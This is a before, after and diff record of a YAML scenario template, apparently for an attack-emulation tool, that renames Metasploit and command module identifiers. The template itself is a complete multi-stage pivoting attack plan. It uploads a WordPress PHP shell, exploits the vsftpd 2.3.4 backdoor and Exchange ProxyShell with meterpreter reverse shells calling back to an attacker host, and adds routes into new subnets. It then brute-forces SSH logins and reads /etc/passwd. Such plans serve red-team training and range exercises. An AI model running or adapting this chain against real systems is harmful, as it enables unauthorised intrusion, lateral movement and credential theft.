examples/scenarios/pivoting-example/template.yml (before)
---
# A pivoting example that first exploits a WordPress service and uses it to discover the next network.
# It repeats the same process with other services (FTP, MS Exchange, SSH) that are in different networks.
# Required modules: mod_msf, mod_cmd.

plan:
  name: Pivoting example
  owner: Cryton
  settings:
    separator: "|"
  stages:
    # Stage 1
    - name: 1-wordpress-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0

      steps:
        - name: upload-php-shell
          is_init: true
          step_type: worker/execute
          arguments:
            create_named_session: session-to-wordpress
            module: mod_msf
            module_arguments:
              module_type: exploit
              module: unix/webapp/wp_admin_shell_upload
              module_options:
                RHOSTS: {{ wordpress.host }}
                USERNAME: {{ wordpress.username }}
                PASSWORD: {{ wordpress.password }}
              payload: php/meterpreter/reverse_tcp
              payload_options:
                LHOST: {{ cryton.host }}
          next:
            - type: result
              value: OK
              step: create-route-to-network-1

        - name: create-route-to-network-1
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: mod_msf
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ wordpress.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 2
    - name: 2-ftp-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 1-wordpress-exploitation
      steps:
        - name: exploit-ftp-server
          step_type: worker/execute
          is_init: true
          arguments:
            create_named_session: session-to-ftp
            module: mod_msf
            module_arguments:
              module_type: exploit
              module: unix/ftp/vsftpd_234_backdoor
              module_options:
                RHOSTS: {{ ftp.host }}
              payload: cmd/unix/interact
              module_retries: 3
          next:
            - type: result
              value: OK
              step: create-route-to-network-2

        - name: create-route-to-network-2
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: mod_msf
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ ftp.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 3
    - name: 3-msf-exchange-server-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 2-ftp-exploitation
      steps:
        - name: exploit-exchange-server
          step_type: worker/execute
          is_init: true
          arguments:
            create_named_session: session-to-exchange
            module: mod_msf
            module_arguments:
              module_type: exploit
              module: exploit/windows/http/exchange_proxyshell_rce
              module_options:
                RHOSTS: {{ exchange.host }}
                email: {{ exchange.email }}
              payload: windows/x64/meterpreter/reverse_tcp
              payload_options:
                LHOST: {{ cryton.host }}
          next:
            - type: result
              value: OK
              step: create-route-to-network-3

        - name: create-route-to-network-3
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: mod_msf
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ exchange.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 4
    - name: 4-ssh-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 3-msf-exchange-server-exploitation
      steps:
        - name: bruteforce-user
          is_init: true
          step_type: worker/execute
          arguments:
            create_named_session: session-to-ssh
            module: mod_msf
            module_arguments:
              module_type: auxiliary
              module: scanner/ssh/ssh_login
              module_options:
                RHOSTS: {{ ssh.host }}
                USERNAME: {{ ssh.username }}
                PASSWORD: {{ ssh.password }}
                STOP_ON_SUCCESS: true
          next:
            - type: result
              value: OK
              step: get-passwd-file

        - name: get-passwd-file
          step_type: worker/execute
          arguments:
            use_named_session: session-to-ssh
            module: mod_cmd
            module_arguments:
              cmd: cat /etc/passwd

examples/scenarios/pivoting-example/template.yml (after)
---
# A pivoting example that first exploits a WordPress service and uses it to discover the next network.
# It repeats the same process with other services (FTP, MS Exchange, SSH) that are in different networks.
# Required modules: metasploit, command.

plan:
  name: Pivoting example
  owner: Cryton
  settings:
    separator: "|"
  stages:
    # Stage 1
    - name: 1-wordpress-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0

      steps:
        - name: upload-php-shell
          is_init: true
          step_type: worker/execute
          arguments:
            create_named_session: session-to-wordpress
            module: metasploit
            module_arguments:
              module_type: exploit
              module: unix/webapp/wp_admin_shell_upload
              module_options:
                RHOSTS: {{ wordpress.host }}
                USERNAME: {{ wordpress.username }}
                PASSWORD: {{ wordpress.password }}
              payload: php/meterpreter/reverse_tcp
              payload_options:
                LHOST: {{ cryton.host }}
          next:
            - type: result
              value: OK
              step: create-route-to-network-1

        - name: create-route-to-network-1
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: metasploit
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ wordpress.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 2
    - name: 2-ftp-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 1-wordpress-exploitation
      steps:
        - name: exploit-ftp-server
          step_type: worker/execute
          is_init: true
          arguments:
            create_named_session: session-to-ftp
            module: metasploit
            module_arguments:
              module_type: exploit
              module: unix/ftp/vsftpd_234_backdoor
              module_options:
                RHOSTS: {{ ftp.host }}
              payload: cmd/unix/interact
              module_retries: 3
          next:
            - type: result
              value: OK
              step: create-route-to-network-2

        - name: create-route-to-network-2
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: metasploit
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ ftp.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 3
    - name: 3-msf-exchange-server-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 2-ftp-exploitation
      steps:
        - name: exploit-exchange-server
          step_type: worker/execute
          is_init: true
          arguments:
            create_named_session: session-to-exchange
            module: metasploit
            module_arguments:
              module_type: exploit
              module: exploit/windows/http/exchange_proxyshell_rce
              module_options:
                RHOSTS: {{ exchange.host }}
                email: {{ exchange.email }}
              payload: windows/x64/meterpreter/reverse_tcp
              payload_options:
                LHOST: {{ cryton.host }}
          next:
            - type: result
              value: OK
              step: create-route-to-network-3

        - name: create-route-to-network-3
          meta:
            note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
          step_type: worker/execute
          arguments:
            module: metasploit
            module_arguments:
              module_type: post
              module: multi/manage/autoroute
              module_options:
                CMD: add
                SUBNET: {{ exchange.subnet_ip }}
                SESSION: $upload-php-shell|session_id

    # Stage 4
    - name: 4-ssh-exploitation
      trigger_type: delta
      trigger_args:
        seconds: 0
      depends_on:
        - 3-msf-exchange-server-exploitation
      steps:
        - name: bruteforce-user
          is_init: true
          step_type: worker/execute
          arguments:
            create_named_session: session-to-ssh
            module: metasploit
            module_arguments:
              module_type: auxiliary
              module: scanner/ssh/ssh_login
              module_options:
                RHOSTS: {{ ssh.host }}
                USERNAME: {{ ssh.username }}
                PASSWORD: {{ ssh.password }}
                STOP_ON_SUCCESS: true
          next:
            - type: result
              value: OK
              step: get-passwd-file

        - name: get-passwd-file
          step_type: worker/execute
          arguments:
            use_named_session: session-to-ssh
            module: command
            module_arguments:
              cmd: cat /etc/passwd

examples/scenarios/pivoting-example/template.yml (diff)
@@ -1,7 +1,7 @@
 ---
 # A pivoting example that first exploits a WordPress service and uses it to discover the next network.
 # It repeats the same process with other services (FTP, MS Exchange, SSH) that are in different networks.
-# Required modules: mod_msf, mod_cmd.
+# Required modules: metasploit, command.
 
 plan:
   name: Pivoting example
@@ -21,7 +21,7 @@ plan:
           step_type: worker/execute
           arguments:
             create_named_session: session-to-wordpress
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: exploit
               module: unix/webapp/wp_admin_shell_upload
@@ -42,7 +42,7 @@ plan:
             note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
           step_type: worker/execute
           arguments:
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: post
               module: multi/manage/autoroute
@@ -64,7 +64,7 @@ plan:
           is_init: true
           arguments:
             create_named_session: session-to-ftp
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: exploit
               module: unix/ftp/vsftpd_234_backdoor
@@ -82,7 +82,7 @@ plan:
             note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
           step_type: worker/execute
           arguments:
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: post
               module: multi/manage/autoroute
@@ -104,7 +104,7 @@ plan:
           is_init: true
           arguments:
             create_named_session: session-to-exchange
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: exploit
               module: exploit/windows/http/exchange_proxyshell_rce
@@ -124,7 +124,7 @@ plan:
             note: If you try to add the same route (on the second run) the module will fail. However, the route still exists so its fine.
           step_type: worker/execute
           arguments:
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: post
               module: multi/manage/autoroute
@@ -146,7 +146,7 @@ plan:
           step_type: worker/execute
           arguments:
             create_named_session: session-to-ssh
-            module: mod_msf
+            module: metasploit
             module_arguments:
               module_type: auxiliary
               module: scanner/ssh/ssh_login
@@ -164,6 +164,6 @@ plan:
           step_type: worker/execute
           arguments:
             use_named_session: session-to-ssh
-            module: mod_cmd
+            module: command
             module_arguments:
               cmd: cat /etc/passwd
